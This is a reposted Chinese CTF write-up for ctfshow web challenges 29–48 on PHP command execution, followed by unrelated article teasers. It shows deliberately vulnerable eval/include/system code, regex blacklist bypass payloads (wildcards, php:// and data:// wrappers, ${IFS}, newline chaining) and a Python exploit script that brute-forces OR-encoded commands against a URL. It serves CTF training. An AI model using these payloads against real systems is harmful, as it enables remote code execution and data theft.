CTFSHOW WEB入门 命令执行 web29-48_if (preg_match("/ph/i", substr($_files["file"]["na-程序员宅基地
技术标签: ctfshow-web入门 大数据
目录
web29
#flag在源代码里
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}1.?c=system("cp fla?.php 1.txt") 直接访问/1.txt
2.?c=system("tac fla*.php") // ?c=system("tac fla?.php")
3.?c=eval($_POST[1]); post 1=phpinfo();
测试成功后,使用蚁剑访问,即可查看flag
web30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 过滤flag system php
1.?c=eval($_POST[1]); post 1=phpinfo();
测试成功后,使用蚁剑访问,即可查看flag
2.?c=`cp fla?.??? 1.txt`; 直接访问/1.txt
3.?c=`cp fla*.*** 1.txt`; 直接访问/1.txt
web31
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号
1.?c=echo`tac%09fl*`;
2.?c=eval($_POST[1]); 1=phpinfo(); OR 1=system("tac flag.php");
测试成功后,使用蚁剑访问,即可查看flag
3.?c=eval($_GET[1]);&1=phpinfo(); OR 1=system("tac flag.php");
4.show_source(next(array_reverse(scandir(pos(localeconv()))))); //查看flag.php源代码
web32
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号
1.?c=include%0a$_GET[1]?%3E&1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
2.?c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
3.?c=include%0a$_POST[1]?%3E(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web33
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web34
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
语言结构:echo print isset unset include require
web35
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号 < =
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web36
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号 < = / 0-9
1.?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[a]?>(post)a=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[a]?>(post)a=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web37
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}1.?c=data://text/plain,<?php system("tac fla*")?>
或使用base64封装数据
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
2.?c=data://text/plain,<?php system("mv fla?.php 1.txt")?>
web38
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}1.?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
2.?c=data://text/plain,<?= system("tac fla*");?>
web39
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}?c=data://text/plain,<?= system("tac fla*");?>
web40
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
web41【跑脚本 但不会】
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>参考网站:ctfshow web入门 web41_yu22x的博客-程序员宅基地
rce_or.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Y4tacker
# @Date: 2020-11-21 20:31:22
*/
//或
function orRce($par1, $par2){
$result = (urldecode($par1)|urldecode($par2));
return $result;
}
//异或
function xorRce($par1, $par2){
$result = (urldecode($par1)^urldecode($par2));
return $result;
}
//取反
function negateRce(){
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}
//mode=1代表或,2代表异或,3代表取反
//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式
function generate($mode, $preg='/[0-9]/i'){
if ($mode!=3){
$myfile = fopen("rce.txt", "w");
$contents = "";
for ($i=0;$i<256;$i++){
for ($j=0;$j<256;$j++){
if ($i<16){
$hex_i = '0'.dechex($i);
}else{
$hex_i = dechex($i);
}
if ($j<16){
$hex_j = '0'.dechex($j);
}else{
$hex_j = dechex($j);
}
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
echo "";
}else{
$par1 = "%".$hex_i;
$par2 = '%'.$hex_j;
$res = '';
if ($mode==1){
$res = orRce($par1, $par2);
}else if ($mode==2){
$res = xorRce($par1, $par2);
}
if (ord($res)>=32&ord($res)<=126){
$contents=$contents.$res." ".$par1." ".$par2."\n";
}
}
}
}
fwrite($myfile,$contents);
fclose($myfile);
}else{
negateRce();
}
}
generate(1,'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i');
//1代表模式,后面的是过滤规则
本地运行脚本
php-cgi.exe -f [绝对路径]\rce_or.phpexp.py
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php D:\\phpstudy_pro\\WWW\\rce_fuzz.php") # 没有将php写入环境变量需手动运行
if (len(argv) != 2):
print("=" * 50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("=" * 50)
exit(0)
url = argv[1]
def action(arg):
s1 = ""
s2 = ""
for i in arg:
f = open(r"D:\phpstudy_pro\WWW\rce.txt", "r")//填txt的文件位置
while True:
t = f.readline()
if t == "":
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = "(\"" + s1 + "\"|\"" + s2 + "\")"
return (output)
while True:
param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
data = {
'c': urllib.parse.unquote(param)
}
r = requests.post(url, data=data)
print("\n[*] result:\n" + r.text)
运行命令
python exp.py [url]
web42
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}1.?c=tac flag.php%0a
2.?c=tac flag.php;ls
3.?c=cat flag.php;
4.?c=cat flag.php||
5.?c=cat flag.php%26
6.?c=cat flag.php%26%26
测试成功的结尾(换行) ①%0a ②; ③|| ④%26 ⑤%26%26
【参考文章】
commond > /dev/null 2>&1 命令详解_Jimmy1224的博客-程序员宅基地_2>&1 >/dev/null
2>/dev/null和>/dev/null 2>&1和2>&1>/dev/null的区别_林猛男的博客-程序员宅基地_>/dev/null
system($c." >/dev/null 2>&1");个人理解:
1.传入变量c到伪设备上,执行/dev/null - 接受并丢弃所有输入; 不产生输出(总是在读取时返回文件结束指示
2.2>&1 表示将标准输出和标准错误输出都重定向到/dev/null中
【多种/dev/null区别】
2>/dev/null
意思就是把错误输出到“黑洞”
>/dev/null 2>&1
默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出2重定向到标准输出1,也就是标准输出和错误输出都进了“黑洞”
2>&1 >/dev/null
意思就是把错误输出2重定向到标准出书1,也就是屏幕,标准输出进了“黑洞”,也就是标准输出进了黑洞,错误输出打印到屏幕
web43
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}过滤 分号和cat
1.?c=tac flag.php%0a
2.?c=tac flag.php||
3.?c=tac flag.php%26
4.?c=tac flag.php%26%26
测试成功的结尾(换行) ①%0a ②|| ③%26 ④%26%26
#过滤cat 使用nl也可以正常运行
web44
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤flag 使用 * ?进行匹配
1.?c=tac fla*%0a
2.?c=tac fla?????%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
#过滤cat 使用nl也可以正常运行
web45
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤空格 使用%09 ${IFS}$ $IFS替换
1.?c=tac${IFS}$fla*||
2.?c=echo$IFS`tac$IFS*`%0A
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web46
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤数字 $ *
1.?c=tac%09fla?????||
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web47
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
} 多过滤more less head sort tail
1.?c=tac%09fla?????||
2.?c=tac%09fla''g.php%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web48
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
} 多过滤sed cut awk string od curl `
1.?c=tac%09fla?????||
2.?c=tac%09fla''g.php%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
智能推荐
SpringMVC文件上传功能总结_spring mvc文件上传总结-程序员宅基地
文章浏览阅读174次。Springmvc文件上传功能demo,不多说直接上代码dispatcherServlet-servlet.xml中bean配置<bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver"> <property name=..._spring mvc文件上传总结
Sql优化总结!详细!(2021最新面试必问)-程序员宅基地
文章浏览阅读10w+次,点赞625次,收藏5.8k次。Sql优化基础Sql优化查询SQL尽量不要使用select *,而是具体字段避免在where子句中使用or来连接条件使用varchar代替char尽量使用数值替代字符串类型查询尽量避免返回大量数据使用explain分析你SQL执行计划是否使用了索引及其扫描类型创建name字段的索引优化like语句:字符串怪现象索引不宜太多,一般5个以内索引不适合建在有大量重复数据的字段上where限定查询的数据避免在索引列上使用内置函数避免在where中对字段进行表达式操作避免在where子句中使用!=或<>操_sql优化
5G网络用户面时延测量_5g用户面时延-程序员宅基地
文章浏览阅读1.9k次。虽然可以用各分段时延相加获得大致测量 5G 上行或者下行的空口单向时延, 但是由于各分段时延是已经统计平均的,所以没有办法进行 空口单向时延的可靠性测量,且得到的还只是一个大致的单向时延统计而非精确的测量结果(因为上下行都含了部分往返时延)。虽然说5G实现了用户面和控制面的解偶,但是在实际的数据传输过程中,一个数据包从用户发出到到达基站,会有用户面的时延也会有控制面的时延吧,也就是说用户面时延和控制面时延是纠缠在一起的吧。而在3GPP TS38.314中定义的RAN侧下行分组时延包括下图红线的四个部分。.._5g用户面时延
自创 魔法水滴——Qt界面设计与实现_qt 水滴-程序员宅基地
文章浏览阅读116次。通过Qt框架的强大支持,我们开发了一款功能丰富的图形化软件——魔法水滴。通过本次开发,我们深入了解了Qt框架和图形处理的基本知识,并且锻炼了自己的代码实现能力。整体布局采用垂直布局,上部分为菜单栏和工具栏,下部分为画布和状态栏。魔法水滴是一款基于Qt框架的图形化软件,提供了一个漂亮的界面和丰富的功能,能够帮助用户轻松地进行图片处理。画笔:支持调节线条宽度和颜色,并能切换成橡皮擦和填充工具。直线和圆形:支持调节线条宽度和颜色,可自由绘制直线和圆形。文本工具:支持调节字体和颜色,并能够进行文字输入。_qt 水滴
各种加密-程序员宅基地
文章浏览阅读3.1k次。各种加密栅栏密码(Rail-fence Cipher) 曲路密码(Curve Cipher) 列移位密码(Columnar Transposition Cipher) 替换加密:埃特巴什码(Atbash Cipher) 凯撒密码(Caesar Cipher) ROT5/13/18/47 简单换位密码(Simple Substitution Cipher) 希尔密码(Hill Ciphe
自建Maven项目如何发布到Sonatype和Central中央仓库中(一)?_sonatype 添加域名解析-程序员宅基地
文章浏览阅读568次。如何在Sonatype上创建账号,发布Maven项目到中心仓库_sonatype 添加域名解析
随便推点
a-select-程序员宅基地
文章浏览阅读712次。a-select支持搜索_a-select
优思学院-国际精益六西格玛研究所(iLSSi)的合作伙伴关系及资格互认_外企接受优思学院的六西格玛-程序员宅基地
文章浏览阅读494次。Strategic Partnership BetweenUCOURSE.ORGandInternational Lean Six Sigma Institute(iLSSi)UCOURSE.ORG(优思学院): We are excited to announce that we are officially partnered with theInternational Lean Six Sigma Institute (iLSSi)andJohn Dennisfor the..._外企接受优思学院的六西格玛
检测手机号年龄性别_电话号码筛选年龄-程序员宅基地
文章浏览阅读2.2k次。如何检测手机号年龄性别?这个问题普遍存在疑问...... 现代企业营销都是离不开手机号码的,但是企业营销之前的差距却不是一点点大。有的企业的营销效果很好,而有的企业的就一般般,这是为什么呢?电话数字中继语音呼系统自动呼叫用户,系统呼叫用户过程中,根据用户端返回的语音信号来判断此号用号码的状态。空号检测可以把手机号码当中的空号检测出来(空号包括空号、停机、关机、过期号码等,所有打不通的都是空号),过滤掉留下可以使用的号码给客户使用。1、按省份筛选号码年龄性别2、按地级市(地区、城市)..._电话号码筛选年龄
轻松提高SketchUp技能的15个简单技巧_su场景管理器-程序员宅基地
文章浏览阅读747次。轻松提高SketchUp技能的15个简单技巧_su场景管理器
中间件 | Redis - [安装 & 配置]_redisde 中间件的安装-程序员宅基地
文章浏览阅读334次。中间件 | Redis - [安装]_redisde 中间件的安装
关于JVM(基本常识)_jvm是什么意思-程序员宅基地
文章浏览阅读1.4w次,点赞10次,收藏82次。目录一、JVM是什么 1、概述二、为什么要用JVM 1、java程序的执行流程 2、JVM的架构一、JVM是什么 1、概述 关于JVM,在百度上的解释为:JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。引入Java语言虚拟机后,Java语言在不同平台..._jvm是什么意思